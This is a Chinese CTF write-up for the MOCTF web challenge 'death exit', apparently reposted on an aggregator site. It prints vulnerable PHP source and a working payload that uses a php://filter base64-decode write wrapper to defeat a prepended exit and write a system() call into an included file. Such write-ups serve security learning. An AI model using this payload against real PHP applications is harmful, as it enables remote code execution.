1、題目：

2、傳送門：http://119.23.73.3:5003/

代碼：

<?phpshow_source(__FILE__);$c="<?php exit;?>"; //$c=一個退出的php代碼@$c.=$_POST['c']; //.=詳解見下方：$c=$c$_POST['c']->//$c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==@$filename=$_POST['file']; if(!isset($filename)) //如果$filename不存在，執(zhí)行{}里的{ file_put_contents('tmp.php', ''); //將空寫入tmp.php} @file_put_contents($filename, $c); //將$c寫入$filenameinclude('tmp.php'); //包含tmp.php文件 ?>

注：
.=詳解

$a.='bbb' 如果$a的值是字符串a(chǎn)的話 那$a的值應(yīng)該是'abbb'，將a加到bbb的左邊 同理的操作符還有+=、-=、*=、/=

file_put_contents() 函數(shù)把一個字符串寫入文件中
file_put_contents(file,data,mode,context)

3、代碼分析：

• 通過上傳字符串變量c，變量c連接<?php exit;?>破壞掉語句結(jié)構(gòu)；同時(shí)變量c也需要寫入到變量filename這個文件中通過執(zhí)行獲得flag。

• 這里就需要用到php://filter偽協(xié)議流來進(jìn)行繞過。使用base64解碼的一個漏洞（base64解碼不能解碼<、?、空格、?、；、>等這幾個字符），然后就只會解碼phpexit，但base64解碼是以4個為一組進(jìn)行解碼的，phpexit只有7個，所以需要添加一個字符構(gòu)成八個字符，才能正常解碼，這里隨便一個字符就行，然后再連接這里我們需要執(zhí)行獲取flag的命令，所以$c的pyaload為：$c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==（a后面的數(shù)值進(jìn)行base64解碼為<?php system('cat flag.php');?>base64加密之后的字符），最后$c的值為：<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

• 然后就是利用php://filter偽協(xié)議了，file的payload為：file=php://filter/write=convert.base64-decode/resource=tmp.php

• 最終的payload為：c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

• Payload帶入源碼：

<?phpshow_source(__FILE__);$c="<?php exit;?>";@$c.=$_POST['c']; //步驟見下一行注釋//$c=$c$_POST['c']->$c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==@$filename=$_POST['file']; //$filenmae=php://filter/write=convert.base64-decode/resource=tmp.phpif(!isset($filename)){ file_put_contents('tmp.php', '');} @file_put_contents($filename, $c);//$filename=$c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==include('tmp.php'); ?>

使用file=php://filter/write=convert.base64-decode/resource=tmp.php時(shí)，file的值<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==進(jìn)行base64解碼時(shí)，刪除<、?、空格、?、；、>還剩52個字符，是phpexitaPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==，正好可以除以4，最后base64解碼后為：|{-ú<?php system('cat flag.php');?>，現(xiàn)在tmp.php中是|{-ú<?php system('cat flag.php');?>，所以可以執(zhí)行里面的代碼，拿到flag

4、拿取flag

最查看源碼，得到flag：

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯，堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎

總結(jié)

以上是生活随笔為你收集整理的MOCTF-Web-死亡退出的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。